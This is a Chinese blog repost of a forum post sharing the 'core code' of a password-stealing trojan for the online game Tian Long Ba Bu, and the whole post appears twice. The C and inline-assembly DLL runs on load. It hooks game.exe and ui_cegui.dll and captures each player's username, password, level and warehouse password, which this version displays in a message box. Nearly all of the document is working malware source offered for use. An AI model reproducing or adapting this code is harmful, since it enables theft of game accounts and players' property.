天龙八部***核心代码
2012-02-15 09:05
246 查看
天龙八部***核心代码
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:认真的雪
我也来凑凑热闹.....
发一个网游***核心代码...无聊的时候写的..
截取了用户名,密码,等级,仓库密码
代码:
#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
DWORD ui_cegui;
void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;
char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;
DWORD stroePath=0;
void _stdcall StroeUnhook();
void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{
*lpRet=(void*)buff;
return i+(DWORD)hModule;
}
}
return 0;
}
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{
*lpRet=(void*)buff;
return i+(DWORD)hModule;
}
}
return 0;
}
void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);
return;
}
__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}
void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;
}
__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}
void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);
::MessageBox(NULL,data,"ok",0);
}
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];
}
}
void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void HookGrade()
{
DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();
return 0;
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
DWORD ThreadId;
CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
break;
}
default:break;
}
return TRUE;
}
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:认真的雪
我也来凑凑热闹.....
发一个网游***核心代码...无聊的时候写的..
截取了用户名,密码,等级,仓库密码
代码:
#include <windows.h>
BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};
BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};
BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};
BYTE oldStoreCode[6]={0};
BYTE storeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};
DWORD ui_cegui;
void *lpUserRet=NULL;
void *lpGradeRet=NULL;
void *lpStoreRet=NULL;
char user[40];
char pass[40];
char storePassWord[40];
DWORD dwGrade;
DWORD stroePath=0;
void _stdcall StroeUnhook();
void _stdcall HookStroe();
DWORD CmpFlag(BYTE *flag,char *moduleName,int len,void **lpRet , DWORD *lpModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
void *newModule=VirtualAlloc( NULL, imageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
*lpModule=(DWORD)newModule;
memcpy(newModule,(void*)hModule,imageSize);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)((DWORD)newModule+i);
if(memcmp(buff,flag,len)==0)
{
*lpRet=(void*)buff;
return i+(DWORD)hModule;
}
}
return 0;
}
DWORD GetRealFlag(BYTE *flag,char *moduleName,int len,void **lpRet,DWORD newModule)
{
BYTE *buff=NULL;
HMODULE hModule=::GetModuleHandle(moduleName);
if(hModule==NULL)
{
::MessageBox(NULL,"获取模块错误","failed",0);
return 0;
}
DWORD imageSize=*(DWORD*)(*(DWORD*)((DWORD)hModule+0x3c)+(DWORD)hModule+0x50);
for(DWORD i=0;i<imageSize;i++)
{
buff=(BYTE*)(newModule+i);
if(memcmp(buff,flag,len)==0)
{
*lpRet=(void*)buff;
return i+(DWORD)hModule;
}
}
return 0;
}
void _stdcall GetUserBuff(char *userName,char *passWord)
{
strcpy(user,userName);
strcpy(pass,passWord);
return;
}
__declspec(naked)void GetUserAndPass()
{
_asm
{
push eax;
mov eax,dword ptr ss:[ebp+0xC];
push eax;
push ecx;
call GetUserBuff;
call StroeUnhook;
pop eax;
jmp [lpUserRet];
}
}
void _stdcall GetGradeDword(DWORD grade)
{
dwGrade=grade;
return;
}
__declspec(naked)void GetGrade()
{
_asm
{
pushad;
push ebx;
call GetGradeDword;
call HookStroe;
popad;
jmp [lpGradeRet];
}
}
void _stdcall StroeUnhook()
{
if(stroePath==0)
return;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,oldStoreCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void _stdcall GetStoreBuff(char *storePass)
{
strcpy(storePassWord,storePass);
char data[256];
wsprintf(data,"用户名:%s\n密码:%s\n等级:%d\n仓库密码:%s\n",user,pass,dwGrade,storePassWord);
::MessageBox(NULL,data,"ok",0);
}
__declspec(naked)void GetStore()
{
_asm
{
pushad;
push ecx;
call GetStoreBuff;
call StroeUnhook;
popad;
jmp [lpStoreRet];
}
}
void _stdcall HookStroe()
{
stroePath=GetRealFlag(storeCode,"ui_cegui.dll",9,&lpStoreRet,ui_cegui);
if(stroePath==0)
return ;
stroePath=stroePath+0x43;
lpStoreRet=(void*)((DWORD)lpStoreRet+0x43);
DWORD jmpAddress=(DWORD)GetStore-(stroePath+5);
*(DWORD*)(&storeJmpCode[1])=jmpAddress;
memcpy(oldStoreCode,(BYTE*)stroePath,6);
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)stroePath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)stroePath,storeJmpCode,6);
VirtualProtect((void*)stroePath,7,mbi.Protect,0);
return;
}
void HookGrade()
{
DWORD passPath=CmpFlag(gradeCode,"ui_cegui.dll",6,&lpGradeRet,&ui_cegui);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetGrade-(passPath+5);
*(DWORD*)(&gradeJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,gradeJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
void HookUserAndPass()
{
DWORD hModule;
DWORD passPath=CmpFlag(userCode,"game.exe",7,&lpUserRet,&hModule);
if(passPath==0)
return ;
DWORD jmpAddress=(DWORD)GetUserAndPass-(passPath+5);
*(DWORD*)(&userJmpCode[1])=jmpAddress;
MEMORY_BASIC_INFORMATION mbi;
VirtualProtect((void*)passPath,7,PAGE_READWRITE,(DWORD*)&mbi);
memcpy((void*)passPath,userJmpCode,6);
VirtualProtect((void*)passPath,7,mbi.Protect,0);
}
DWORD WINAPI Thread(LPVOID lpParam)
{
HookUserAndPass();
HookGrade();
return 0;
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
DWORD ThreadId;
CreateThread(NULL,NULL,Thread,NULL,NULL,&ThreadId);
break;
}
default:break;
}
return TRUE;
}
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 天龙八部木马核心代码,版本0.50.0385
- 搞了个自动竞赛做题的神器-:---------仅此纪念(核心代码,欢迎转载,保留链接,感激不尽)
- 核心代码的实现
- 针对Chrome和Safari等Webkit核心浏览器的CSS hack代码
- 动态列核心代码
- ecsshop数据库核心类代码
- iOS 实现类似雷达效果的核心代码
- 基于Visual C++之Windows核心编程代码分析(2)实现Windows用户管理
- Darwin Streaming Server 核心代码分析
- 2013-04-22期-搜索引擎核心代码1
- 公布一下工资管理系统中核心部分工资计算的代码
- peersim中BT网络核心代码解析
- OkHttp源码解读总结(六)--->OkHttp拦截器核心代码总结
- 熊猫烧香核心代码
- 生成静态文件的新闻系统核心代码(.net C#)二 选择自 bmiracle 的 Blog
- discuz论坛apache日志hadoop大数据分析项目:清洗数据核心功能解说及代码实现
- Android核心功能开发SearchView使用的开发(代码共享)
- 最长公共子序列核心代码(clodeblocks运行通过)
- 基于visual c++之windows核心编程代码分析(45)利用Windows系统服务启动程序
- 基于visual c++之windows核心编程代码分析(52)使用WMI 获取进程启动参数